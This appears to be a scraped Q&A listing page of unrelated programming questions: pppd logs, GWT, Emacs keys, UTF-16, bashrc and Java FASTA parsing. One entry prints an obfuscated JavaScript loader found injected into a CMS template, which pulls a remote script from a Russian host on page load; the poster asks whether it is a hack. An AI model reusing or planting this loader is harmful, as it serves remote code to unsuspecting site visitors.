desktop pppd[5681]: Using interface ppp0 Oct 16 15:30:47 desktop pppd[5681]: Connect: ppp0 <--> /dev/ttyUSB2 Oct 16 15:30:47 desktop pppd[5681]: CHAP authentication succeeded Oct 16 15:30:47 desktop pppd[5681]: CHAP authentication succeeded Oct 16 15:30:48 desktop pppd[5681]: local IP address 14.96.147.104 Oct 16 15:30:48 desktop pppd[5681]: remote IP address 172.29.161.223 Oct 16 15:30:48 desktop pppd[5681]: primary DNS address 121.40.152.90 Oct 16 15:30:48 desktop pppd[5681]: secondary DNS address 121.40.152.100 EDIT 1 : I tried the following sudo stop network-manager sudo killall modem-manager sudo /usr/sbin/modem-manager --debug > ~/mm.log 2>&1 & sudo /usr/sbin/NetworkManager --no-daemon > ~/nm.log 2>&1 & Output of mm.log: #vim ~/mm.log: ** Message: Loaded plugin Option High-Speed ** Message: Loaded plugin Option ** Message: Loaded plugin Huawei ** Message: Loaded plugin Longcheer ** Message: Loaded plugin AnyData ** Message: Loaded plugin ZTE ** Message: Loaded plugin Ericsson MBM ** Message: Loaded plugin Sierra ** Message: Loaded plugin Generic ** Message: Loaded plugin Gobi ** Message: Loaded plugin Novatel ** Message: Loaded plugin Nokia ** Message: Loaded plugin MotoC Output of nm.log: #vim ~/nm.log: NetworkManager: <info> starting... NetworkManager: <info> modem-manager is now available NetworkManager: SCPlugin-Ifupdown: init! NetworkManager: SCPlugin-Ifupdown: update_system_hostname NetworkManager: SCPluginIfupdown: guessed connection type (eth0) = 802-3-ethernet NetworkManager: SCPlugin-Ifupdown: update_connection_setting_from_if_block: name:eth0, type:802-3-ethernet, id:Ifupdown (eth0), uuid: 681b428f-beaf-8932-dce4-678ed5bae28e NetworkManager: SCPlugin-Ifupdown: addresses count: 1 NetworkManager: SCPlugin-Ifupdown: No dns-nameserver configured in /etc/network/interfaces NetworkManager: nm-ifupdown-connection.c.119 - invalid connection read from /etc/network/interfaces: (1) addresses NetworkManager: SCPluginIfupdown: management mode: unmanaged NetworkManager: SCPlugin-Ifupdown: devices added (path: /sys/devices/pci0000:00/0000:00:14.4/0000:02:02.0/net/eth1, iface: eth1) NetworkManager: SCPlugin-Ifupdown: device added (path: /sys/devices/pci0000:00/0000:00:14.4/0000:02:02.0/net/eth1, iface: eth1): no ifupdown configuration found. NetworkManager: SCPlugin-Ifupdown: devices added (path: /sys/devices/virtual/net/lo, iface: lo) @

    Read the article

  • Geek City: Growing Rows with Snapshot Isolation

    - by Kalen Delaney
    I just finished a wonderful week in Stockholm, teaching a class for Cornerstone Education. We had 19 SQL Server enthusiasts, all eager to find out everything they could about SQL Server Internals. One questions came up on Thursday that I wasn’t sure of the answer to. I jokingly told the student who asked it to consider it a homework exercise, but then I was so interested in the answer, I try to figure it out myself Thursday evening. In this post, I’ll tell you what I did to try to answer the question....(read more)

    Read the article

  • Google Web Toolkit Deferred Binding Issue

    - by snctln
    I developed a web app using GWT about 2 years ago, since then the application has evolved. In its current state it relies on fetching a single XML file and parsing the information from it. Overall this works great. A requirement of this app is that it needs to be able to be ran from the filesystem (file:///..) as well as the traditional model of running from a webserver (http://...) Fetching this file from a webserver works exactly as expected using a RequestBuilder object. When running the app from the filesystem Firefox, Opera, Safari, and Chrome all behave as expected. When running the app from the filesystem using IE7 or IE8 the RequestBuilder.send() call fails, the information about the error suggests that there is a problem accessing the file due to violating the same origin policy. The app worked as expected in IE6 but not in IE7 or IE8. So I looked at the source code of RequestBuilder.java and saw that the actual request was being executed with an XMLHttpRequest GWT object. So I looked at the source code for XMLHttpRequest.java and found out some information. Here is the code (starts at line 83 in XMLHttpRequest.java) public static native XMLHttpRequest create() /*-{ if ($wnd.XMLHttpRequest) { return new XMLHttpRequest(); } else { try { return new ActiveXObject('MSXML2.XMLHTTP.3.0'); } catch (e) { return new ActiveXObject("Microsoft.XMLHTTP"); } } }-*/; So basically if an XMLHttpRequest cannot be created (like in IE6 because it is not available) an ActiveXObject is used instead. I read up a little bit more on the IE implementation of XMLHttpRequest, and it appears that it is only supported for interacting with files on a webserver. I found a setting in IE8 (Tools-Internet Options-Advanced-Security-Enable native XMLHTTP support), when I uncheck this box my app works. I assume this is because I am more of less telling IE to not use their implementation of XmlHttpRequest, so GWT just uses an ActiveXObject because it doesn't think the native XmlHttpRequest is available. This fixes the problem, but is hardly a long term solution. I can currently catch a failed send request and verify that it was trying to fetch the XML file from the filesystem using normal GWT. What I would like to do in this case is catch the IE7 and IE8 case and have them use a ActiveXObject instead of a native XmlHttpRequest object. There was a posting on the GWT google group that had a supposed solution for this problem (link). Looking at it I can tell that it was created for an older version of GWT. I am using the latest release and think that this is more or less what I would like to do (use GWT deferred binding to detect a specific browser type and run my own implementation of XMLHttpRequest.java in place of the built in GWT implementation). Here is the code that I am trying to use package com.mycompany.myapp.client; import com.google.gwt.xhr.client.XMLHttpRequest; public class XMLHttpRequestIE7or8 extends XMLHttpRequest { // commented out the "override" so that eclipse and the ant build script don't throw errors //@Override public static native XMLHttpRequest create() /*-{ try { return new ActiveXObject('MSXML2.XMLHTTP.3.0'); } catch (e) { return new ActiveXObject("Microsoft.XMLHTTP"); } }-*/; // have an empty protected constructor so the ant build script doesn't throw errors // the actual XMLHttpRequest constructor is empty as well so this shouldn't cause any problems protected XMLHttpRequestIE7or8() { } }; And here are the lines that I added to my module xml <replace-with class="com.mycompany.myapp.client.XMLHttpRequestIE7or8"> <when-type-is class="com.google.gwt.xhr.client.XMLHttpRequest"/> <any> <when-property-is name="user.agent" value="ie7" /> <when-property-is name="user.agent" value="ie8" /> </any> </replace-with> From what I can tell this should work, but my code never runs. Does anyone have any idea of what I am doing wrong? Should I not do this via deferred binding and just use native javascript when I catch the fail case instead? Is there a different way of approaching this problem that I have not mentioned? All replies are welcome.

    Read the article

  • Emacs keybindings for texboxes in firefox?

    - by Seamus
    I'm so used to emacs that sometimes, when I'm typing something in a textbox in firefox, I sometimes try and do C-p to move up a line. It is seriously annoying to have to cancel a print dialog box every time I try and move about my text. If it's not horrendously complicated, I'd like to have keybindings that emulate emacs inside textboxes in firefox... Obviously, I wouldn't need all the keybindings, but movement, marking, killing and yanking would be useful. Is this an insane request?

    Read the article

  • Weird Javascript in Template. Is this a hacking attempt?

    - by Julian
    I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. What is this javascript doing? Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script... this.v=27047; this.v+=187; ug=["n"]; OV=29534; OV--; var y; var C="C"; var T={}; r=function(){ b=36068; b-=144; M=[]; function f(V,w,U){ return V.substr(w,U); var wH=39640; } var L=["o"]; var cj={}; var qK={N:false}; var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); var BT="BT"; var fV=RegExp; var CE={bf:false}; var UW=''; this.Ky=11592; this.Ky-=237; var VU=document; var _n=[]; try {} catch(wP){}; this.JY=29554; this.JY-=245; function s(V,w){ l=13628; l--; var U="["+w+String("]"); var rk=new fV(U, f("giId",0,1)); this.NS=18321;this.NS+=195;return V.replace(rk, UW); try {} catch(k){}; }; this.jM=""; var CT={}; var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); try {var vv='m'} catch(vv){}; var Os={}; var t=null; var e=String("bod"+"y"); var F=155183-147103; this.kp=''; Z={Ug:false}; y=function(){ var kl=["mF","Q","cR"]; try { Bf=11271; Bf-=179; var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); Fp=VU[u](A); var H=""; try {} catch(WK){}; this.Ca=19053; this.Ca--; var O=s('s5rLcI','2A5IhLo'); var V=F+fa; this.bK=""; var ya=String("de"+"fe"+f("r3bPZ",0,1)); var bk=new String(); pB=9522; pB++; Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; Fp[ya]=[1][0]; Pe=45847; Pe--; VU[e].appendChild(Fp); var lg=new Array(); var aQ={vl:"JC"}; this.KL="KL"; } catch(x){ this.Ja=""; Th=["pj","zx","kO"]; var Jr=''; }; Tr={qZ:21084}; }; this.pL=false; }; be={}; rkE={hb:"vG"}; r(); var bY=new Date(); window.onload=y; cU=["Yr","gv"];

    Read the article

  • java webservice requires usernametoken over basichttpbinding (3 replies)

    I need to call a Java webservice. I can add a service reference without problems, and I get Intellisense in Visual Studio. However, when I try to call a service method I get an error message saying &quot;Missing (user) Security Information&quot;. I n my code I try to set usercredentials: testWS.WarrantyClaimServiceClient svc new TestClient.testWS.WarrantyClaimServiceClient(); svc.ClientCredentials.UserName....

    Read the article

  • Should UTF-16 be considered harmful?

    - by Artyom
    I'm going to ask what is probably quite a controversial question: "Should one of the most popular encodings, UTF-16, be considered harmful?" Why do I ask this question? How many programmers are aware of the fact that UTF-16 is actually a variable length encoding? By this I mean that there are code points that, represented as surrogate pairs, take more than one element. I know; lots of applications, frameworks and APIs use UTF-16, such as Java's String, C#'s String, Win32 APIs, Qt GUI libraries, the ICU Unicode library, etc. However, with all of that, there are lots of basic bugs in the processing of characters out of BMP (characters that should be encoded using two UTF-16 elements). For example, try to edit one of these characters: 𝄞 (U+1D11E) MUSICAL SYMBOL G CLEF 𝕥 (U+1D565) MATHEMATICAL DOUBLE-STRUCK SMALL T 𝟶 (U+1D7F6) MATHEMATICAL MONOSPACE DIGIT ZERO 𠂊 (U+2008A) Han Character You may miss some, depending on what fonts you have installed. These characters are all outside of the BMP (Basic Multilingual Plane). If you cannot see these characters, you can also try looking at them in the Unicode Character reference. For example, try to create file names in Windows that include these characters; try to delete these characters with a "backspace" to see how they behave in different applications that use UTF-16. I did some tests and the results are quite bad: Opera has problem with editing them (delete required 2 presses on backspace) Notepad can't deal with them correctly (delete required 2 presses on backspace) File names editing in Window dialogs in broken (delete required 2 presses on backspace) All QT3 applications can't deal with them - show two empty squares instead of one symbol. Python encodes such characters incorrectly when used directly u'X'!=unicode('X','utf-16') on some platforms when X in character outside of BMP. Python 2.5 unicodedata fails to get properties on such characters when python compiled with UTF-16 Unicode strings. StackOverflow seems to remove these characters from the text if edited directly in as Unicode characters (these characters are shown using HTML Unicode escapes). WinForms TextBox may generate invalid string when limited with MaxLength. It seems that such bugs are extremely easy to find in many applications that use UTF-16. So... Do you think that UTF-16 should be considered harmful?

    Read the article

  • Prompt not working when logged in as specific user

    - by Clay
    Hello I am running ubuntu 11.10 and access it via ssh with putty. My problem is that when I log in I get the prompt [email protected]:~$ and my arrow keys do what the y are supposed to. When I try to login in as another user account I made all I get is this as the prompt it never says the directory or anyting $ Also when ever I try to use the left, right, up or down arrow I get a character like this ^[[A Is this a bug in putty or did I just not set the account up right?

    Read the article

  • bashrc script not accepting space in directory name

    - by faizal
    I have added a variable at the end of my ~/.basrc file : export xyz = /home/faizal/DEV/ADT workspace/xyz But if i open a new terminal, i get the error : bash: export: 'workspace/xyz': not a valid identifier So i try a variety of alternatives : export xyz=/home/faizal/DEV/ADT\ workspace/xyz export xyz="/home/faizal/DEV/ADT workspace/xyz" export xyz="/home/faizal/DEV/ADT\ workspace/xyz" export xyz='/home/faizal/DEV/ADT workspace/xyz' export xyz='/home/faizal/DEV/ADT\ workspace/xyz' They all give me the error when i try cd $xyz: bash: cd: /home/faizal/DEV/ADT: No such file or directory What am i doing wrong?

    Read the article

  • Customizing / overriding ComboBox (2 replies)

    Hi, I would override a Windows.Forms.Combobox to have a MyObjectCollection instead of a ObjectCollection as Items property. I've try writing this code, but it seems that items are stored somewhere else (not in Items property). I can add items to collection but when I try to select an item from the combobox (at runtime) an exception tells me that there is no such element in Items (litterally it tel...

    Read the article

  • bumblebee does not work with metacity and KWin, but works with compiz

    - by cpu2
    If I try to launch something with optirun under compiz, it works. If I try to launch something with optirun under KDE or metacity, it gives me: [ 247.384077] [ERROR]Cannot access secondary GPU - error: [XORG] (EE) [ 247.384117] [ERROR]Aborting because fallback start is disabled. If it matters, I'm trying to launch Portal 2 with wine I have: Nvidia GeForce GT540M with optimus Acer Aspire Timeline X Intel core i5 and 3000 Integrated Graphics

    Read the article

  • Parse a text file into multiple text file

    - by Vijay Kumar Singh
    I want to get multiple file by parsing a input file Through Java. The Input file contains many fasta format of thousands of protein sequence and I want to generate raw format(i.e., without any comma semicolon and without any extra symbol like "", "[", "]" etc) of each protein sequence. A fasta sequence starts form "" symbol followed by description of protein and then sequence of protein. For example ? lcl|NC_000001.10_cdsid_XP_003403591.1 [gene=LOC100652771] [protein=hypothetical protein LOC100652771] [protein_id=XP_003403591.1] [location=join(12190..12227,12595..12721,13403..13639)] MSESINFSHNLGQLLSPPRCVVMPGMPFPSIRSPELQKTTADLDHTLVSVPSVAESLHHPEITFLTAFCL PSFTRSRPLPDRQLHHCLALCPSFALPAGDGVCHGPGLQGSCYKGETQESVESRVLPGPRHRH Like above formate the input file contains 1000s of protein sequence. I have to generate thousands of raw file containing only individual protein sequence without any special symbol or gaps. I have developed the code for it in Java but out put is : Cannot open a file followed by cannot find file. Please help me to solve my problem. Regards Vijay Kumar Garg Varanasi Bharat (India) The code is /*Java code to convert FASTA format to a raw format*/ import java.io.*; import java.util.*; import java.util.regex.*; import java.io.FileInputStream; // java package for using regular expression public class Arrayren { public static void main(String args[]) throws IOException { String a[]=new String[1000]; String b[][] =new String[1000][1000]; /*open the id file*/ try { File f = new File ("input.txt"); //opening the text document containing genbank ids FileInputStream fis = new FileInputStream("input.txt"); //Reading the file contents through inputstream BufferedInputStream bis = new BufferedInputStream(fis); // Writing the contents to a buffered stream DataInputStream dis = new DataInputStream(bis); //Method for reading Java Standard data types String inputline; String line; String separator = System.getProperty("line.separator"); // reads a line till next line operator is found int i=0; while ((inputline=dis.readLine()) != null) { i++; a[i]=inputline; a[i]=a[i].replaceAll(separator,""); //replaces unwanted patterns like /n with space a[i]=a[i].trim(); // trims out if any space is available a[i]=a[i]+".txt"; //takes the file name into an array try // to handle run time error /*take the sequence in to an array*/ { BufferedReader in = new BufferedReader (new FileReader(a[i])); String inline = null; int j=0; while((inline=in.readLine()) != null) { j++; b[i][j]=inline; Pattern q=Pattern.compile(">"); //Compiling the regular expression Matcher n=q.matcher(inline); //creates the matcher for the above pattern if(n.find()) { /*appending the comment line*/ b[i][j]=b[i][j].replaceAll(">gi",""); //identify the pattern and replace it with a space b[i][j]=b[i][j].replaceAll("[a-zA-Z]",""); b[i][j]=b[i][j].replaceAll("|",""); b[i][j]=b[i][j].replaceAll("\\d{1,15}",""); b[i][j]=b[i][j].replaceAll(".",""); b[i][j]=b[i][j].replaceAll("_",""); b[i][j]=b[i][j].replaceAll("\\(",""); b[i][j]=b[i][j].replaceAll("\\)",""); } /*printing the sequence in to a text file*/ b[i][j]=b[i][j].replaceAll(separator,""); b[i][j]=b[i][j].trim(); // trims out if any space is available File create = new File(inputline+"R.txt"); try { if(!create.exists()) { create.createNewFile(); // creates a new file } else { System.out.println("file already exists"); } } catch(IOException e) // to catch the exception and print the error if cannot open a file { System.err.println("cannot create a file"); } BufferedWriter outt = new BufferedWriter(new FileWriter(inputline+"R.txt", true)); outt.write(b[i][j]); // printing the contents to a text file outt.close(); // closing the text file System.out.println(b[i][j]); } } catch(Exception e) { System.out.println("cannot open a file"); } } } catch(Exception ex) // catch the exception and prints the error if cannot find file { System.out.println("cannot find file "); } } } If you provide me correct it will be much easier to understand.

    Read the article

< Previous Page | 67 68 69 70 71 72 73 74 75 76 77 78  | Next Page >